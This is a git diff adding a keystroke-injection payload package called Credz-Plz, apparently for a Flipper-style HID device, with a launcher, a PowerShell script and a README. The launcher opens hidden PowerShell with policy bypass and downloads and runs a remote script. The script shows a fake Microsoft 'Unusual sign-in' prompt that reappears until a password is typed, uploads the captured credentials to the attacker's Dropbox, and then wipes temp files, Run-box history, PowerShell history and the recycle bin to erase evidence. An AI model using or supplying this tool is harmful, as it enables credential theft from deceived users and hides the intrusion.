diff --git a/Payloads/Flip-Credz-Plz/Credz-Plz-Execute.txt b/Payloads/Flip-Credz-Plz/Credz-Plz-Execute.txt
new file mode 100644
index 0000000..8ee8c8f
--- /dev/null
+++ b/Payloads/Flip-Credz-Plz/Credz-Plz-Execute.txt
@@ -0,0 +1,15 @@
+REM Title: Credz-Plz
+
+REM Author: I am Jakoby
+
+REM Description: This payload is meant to prompt the target to enter their creds to later be exfiltrated with dropbox. See README.md file for more details.
+
+REM Target: Windows 10, 11
+
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
+ENTER
+
+REM Remember to replace the link with your DropBox shared link for the intended file to download
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
diff --git a/Payloads/Flip-Credz-Plz/Credz-Plz.ps1 b/Payloads/Flip-Credz-Plz/Credz-Plz.ps1
new file mode 100644
index 0000000..3a2320e
--- /dev/null
+++ b/Payloads/Flip-Credz-Plz/Credz-Plz.ps1
@@ -0,0 +1,175 @@ +############################################################################################################################################################ +# | ___ _ _ _ # ,d88b.d88b # +# Title : Credz-Plz | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # +# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' # +# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' # +# Category : Credentials | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' # +# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ # +# Mode : HID | |\__/,| (`\ # / -\ /- ~\ # +# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / # +# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo # +# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ # +#__________________________________|_________________________________________________________________________# | | ) ~ ( # +# # / \ / ~ \ # +# github.com/I-Am-Jakoby # \ / \~ ~/ # +# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_# +# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# +# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |# +############################################################################################################################################################ + +<# +.SYNOPSIS + This script is meant to trick your target into sharing their credentials through a fake authentication pop up message + +.DESCRIPTION + A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account" + This will be followed by a fake authentication ui prompt. 
+ If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up + Once the target enters their credentials their information will be uploaded to your dropbox for collection + +.Link + https://developers.dropbox.com/oauth-guide # Guide for setting up your DropBox for uploads + +#> + +#------------------------------------------------------------------------------------------------------------------------------------ + +$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN" + +#------------------------------------------------------------------------------------------------------------------------------------ + +$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_User-Creds.txt" + +#------------------------------------------------------------------------------------------------------------------------------------ + +<# + +.NOTES + This is to generate the ui.prompt you will use to harvest their credentials +#> + +function Get-Creds { +do{ +$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password + if([string]::IsNullOrWhiteSpace([Net.NetworkCredential]::new('', $cred.Password).Password)) { + [System.Windows.Forms.MessageBox]::Show("Credentials can not be empty!") + Get-Creds +} +$creds = $cred.GetNetworkCredential() | fl +return $creds + # ... 
+ + $done = $true +} until ($done) + +} + +#---------------------------------------------------------------------------------------------------- + +<# + +.NOTES + This is to pause the script until a mouse movement is detected +#> + +function Pause-Script{ +Add-Type -AssemblyName System.Windows.Forms +$originalPOS = [System.Windows.Forms.Cursor]::Position.X +$o=New-Object -ComObject WScript.Shell + + while (1) { + $pauseTime = 3 + if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){ + break + } + else { + $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime + } + } +} + +#---------------------------------------------------------------------------------------------------- + +# This script repeadedly presses the capslock button, this snippet will make sure capslock is turned back off + +function Caps-Off { +Add-Type -AssemblyName System.Windows.Forms +$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock') + +#If true, toggle CapsLock key, to ensure that the script doesn't fail +if ($caps -eq $true){ + +$key = New-Object -ComObject WScript.Shell +$key.SendKeys('{CapsLock}') +} +} +#---------------------------------------------------------------------------------------------------- + +<# + +.NOTES + This is to call the function to pause the script until a mouse movement is detected then activate the pop-up +#> + +Pause-Script + +Caps-Off + +Add-Type -AssemblyName System.Windows.Forms + +[System.Windows.Forms.MessageBox]::Show("Unusual sign-in. 
Please authenticate your Microsoft Account") + +$creds = Get-Creds + +#------------------------------------------------------------------------------------------------------------------------------------ + +<# + +.NOTES + This is to save the gathered credentials to a file in the temp directory +#> + +echo $creds >> $env:TMP\$FileName + +#------------------------------------------------------------------------------------------------------------------------------------ + +<# + +.NOTES + This is to upload your files to dropbox +#> + +$TargetFilePath="/$FileName" +$SourceFilePath="$env:TMP\$FileName" +$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' +$authorization = "Bearer " + $DropBoxAccessToken +$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" +$headers.Add("Authorization", $authorization) +$headers.Add("Dropbox-API-Arg", $arg) +$headers.Add("Content-Type", 'application/octet-stream') +Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers + +#------------------------------------------------------------------------------------------------------------------------------------ + +<# + +.NOTES + This is to clean up behind you and remove any evidence to prove you were there +#> + +# Delete contents of Temp folder + +rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue + +# Delete run box history + +reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f + +# Delete powershell history + +Remove-Item (Get-PSreadlineOption).HistorySavePath + +# Deletes contents of recycle bin + +Clear-RecycleBin -Force -ErrorAction SilentlyContinue + diff --git a/Payloads/Flip-Credz-Plz/README.md b/Payloads/Flip-Credz-Plz/README.md new file mode 100644 index 0000000..0f9b198 --- /dev/null +++ b/Payloads/Flip-Credz-Plz/README.md 
@@ -0,0 +1,102 @@ +![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) + + +
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# Credz-Plz + +A script used to prompt the target to enter their creds to later be exfiltrated with dropbox. + +## Description + +A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account" +This will be followed by a fake authentication ui prompt. +If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up +Once the target enters their credentials their information will be uploaded to your dropbox for collection + +![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-Credz-Plz/unusual-sign-in.jpg) + +![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-Credz-Plz/sign-in.jpg) + +## Getting Started + +### Dependencies + +* DropBox or other file sharing service - Your Shared link for the intended file +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory +``` +powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

I am Jakoby

+


+ + + + + + + + + + + + + + + + + + + + Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-ADV-Recon) +

+ + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + +

(back to top)

diff --git a/Payloads/Flip-Credz-Plz/sign-in.jpg b/Payloads/Flip-Credz-Plz/sign-in.jpg new file mode 100644 index 0000000..3330e2a Binary files /dev/null and b/Payloads/Flip-Credz-Plz/sign-in.jpg differ diff --git a/Payloads/Flip-Credz-Plz/unusual-sign-in.jpg b/Payloads/Flip-Credz-Plz/unusual-sign-in.jpg new file mode 100644 index 0000000..ff0aad9 Binary files /dev/null and b/Payloads/Flip-Credz-Plz/unusual-sign-in.jpg differ